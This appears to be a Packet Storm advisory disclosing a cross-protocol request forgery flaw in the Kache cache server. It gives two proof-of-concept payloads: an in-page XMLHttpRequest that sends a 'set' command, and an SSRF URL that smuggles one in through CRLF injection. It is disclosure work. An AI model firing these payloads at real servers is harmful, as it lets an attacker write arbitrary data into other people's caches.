Kache Cross Protocol Request Forgery

2019-03-04T00:00:00
ID PACKETSTORM:151941
Type packetstorm
Reporter Codex Lynx
Modified 2019-03-04T00:00:00

Description

                                        
                                            `# Title: Kache / CPRF  
# Date: 03/01/2019  
# Discovered by: @codexlynx  
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)  
# Category: go, resp, cprf  
  
[1]CPRF (Cross Protocol Request Forgery)  
--------------------------------  
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.  
  
- POC 1: Set a key by HTTP:  
  
<script>  
var x = new XMLHttpRequest();  
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");  
x.send("set mykey myvalue\n");  
</script>  
  
- POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:  
  
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue  
`